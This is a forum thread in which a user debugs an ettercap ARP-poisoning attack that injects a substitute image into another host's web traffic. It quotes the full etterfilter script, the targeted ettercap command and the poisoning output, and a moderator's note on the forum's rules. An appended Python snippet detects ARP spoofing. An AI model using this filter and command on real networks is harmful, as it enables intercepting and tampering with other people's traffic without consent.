I see that 'filter ran' is echoed several times.
Even if the URL isn't https, the web page still gets loaded slowly and incompletely, without the changed image.
Why did the target web browser 'Google Chrome Version 30.0.1566.2' drop the images I am trying to insert?
No idea, since you don't post information about what you did, other than that weblink. Some VERY obvious things:
The picture you referenced for the 'filter' doesn't exist/can't be read?
You're filtering http, NOT https?
You didn't read this part of the page you linked to?
Quote:
Originally Posted by Weblink
Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss
Apropos intentions - I can just say that the ettercap tool is freely available, and it is the choice of any individual to believe or not what I say.
If used maliciously, then the consequences have to be borne by the doer - that I am well aware of.
I read that
Quote:
Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss
Still, I was expecting to see the changed image once on any web page (http://ibnlive.in.com/ in my case).
Have you tried it, or do you intend to?
If yes, then you can help me in solving this, because I have followed the mentioned tutorial step by step.
############################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
   msg("Filter Ran.\n");
}
I conclude that the message 'filter ran' indicates that there is no problem of intervening attributes between img & src which may not cause a pattern match, hence no replacement.
I am not aware if there is some checksum associated which causes the browser to disregard replaced packets as garbage.
Last edited by sumeet inani; 07-19-2013 at 05:46 AM.
Apropos intentions - I can just say that the ettercap tool is freely available, and it is the choice of any individual to believe or not what I say. If used maliciously, then the consequences have to be borne by the doer - that I am well aware of.
And we all are aware of that, but the LQ Rules specifically mention hacking/cracking, and the fact that such things aren't to be discussed. I am not saying we don't believe you, but that we have no way of KNOWING your intentions.
Well, if you did follow the tutorial, you'll notice that you're missing the backslashes before the end of the img src lines, as they are in the tutorial. You'll also notice this part of the tutorial as well:
Quote:
Originally Posted by Ettercap Page
Be careful with the above command, having all of the traffic on a large network going through one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.22.47, we would use this command:
ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //
...which specifically addresses the speed issue you mentioned previously, since you're (apparently) specifying a large range of addresses in your command. Also, the command you typed in for your one workstation
Please pardon my unintended impertinence.
It seems this is not the appropriate place for discussing this stuff.
Anyway, I copied the code ditto from http://www.irongeek.com/i.php?page=s...ettercapfilter
The browsing on the target computer was slow, though.
Code:
ettercap NG-0.7.4_git copyright 2001-2011 ALoR & NaGA
Content filters loaded from ig.ef...
Listening on p5p1... (Ethernet)
p5p1 -> 6C:3B:E5:20:B2:AD 192.168.8.103 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.8.184 00:1E:C9:3E:7D:92
GROUP 2 : 192.168.8.1 1C:E6:C7:52:00:C0
Starting Unified sniffing...
This shows that no other computer on the LAN was targeted.
Still, I see the source code of the target web page mentioning the redirected link at one of two img tags.
The one that did not get replaced had additional attributes in the img tag other than src.
I have written a mail to ettercap.project -at- gmail.com seeking documentation on etterfilter rules.
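Seen from the targeted host, the ARP poisoning in the ettercap output above shows up in the neighbour table: the gateway 192.168.8.1 resolves to the same MAC as the ettercap host 192.168.8.103. The following check is an added example, not part of the thread; it parses `ip neigh show` output, and the sample table is constructed from the addresses in the post plus one made-up neighbour.

```python
import re
from collections import defaultdict

# Constructed sample: `ip neigh show` as the poisoned target (192.168.8.184)
# might see it. 192.168.8.1 / .103 and the 6c:3b:... MAC come from the ettercap
# log in the post; 192.168.8.50, 192.168.8.77 and 00:11:22:33:44:55 are made up.
SAMPLE_NEIGH = """\
192.168.8.1 dev eth0 lladdr 6c:3b:e5:20:b2:ad REACHABLE
192.168.8.103 dev eth0 lladdr 6c:3b:e5:20:b2:ad STALE
192.168.8.50 dev eth0  FAILED
192.168.8.77 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
"""

# Only entries with a resolved link-layer address carry "lladdr <mac>".
LINE_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+(?P<mac>[0-9a-fA-F:]{17})\b"
)

def parse_neigh(text):
    """Yield (ip, dev, mac) for every resolved neighbour entry."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["ip"], m["dev"], m["mac"].lower()

def shared_macs(text):
    """Map (dev, mac) -> sorted IPs for each MAC that answers for several IPs."""
    by_mac = defaultdict(set)
    for ip, dev, mac in parse_neigh(text):
        by_mac[(dev, mac)].add(ip)
    return {key: sorted(ips) for key, ips in by_mac.items() if len(ips) > 1}

def gateway_spoof_suspects(text, gateway_ip):
    """Return (mac, other_ips) when another IP shares the gateway's MAC."""
    for (_dev, mac), ips in shared_macs(text).items():
        if gateway_ip in ips:
            return mac, [ip for ip in ips if ip != gateway_ip]
    return None, []

if __name__ == "__main__":
    mac, suspects = gateway_spoof_suspects(SAMPLE_NEIGH, "192.168.8.1")
    if suspects:
        print(f"gateway 192.168.8.1 shares MAC {mac} with {', '.join(suspects)}")
    else:
        print("no other neighbour shares the gateway's MAC")
```

A shared MAC is a strong hint rather than proof: proxy ARP and hosts with several addresses on one interface produce the same pattern, and the check only fires when both entries are present in the table.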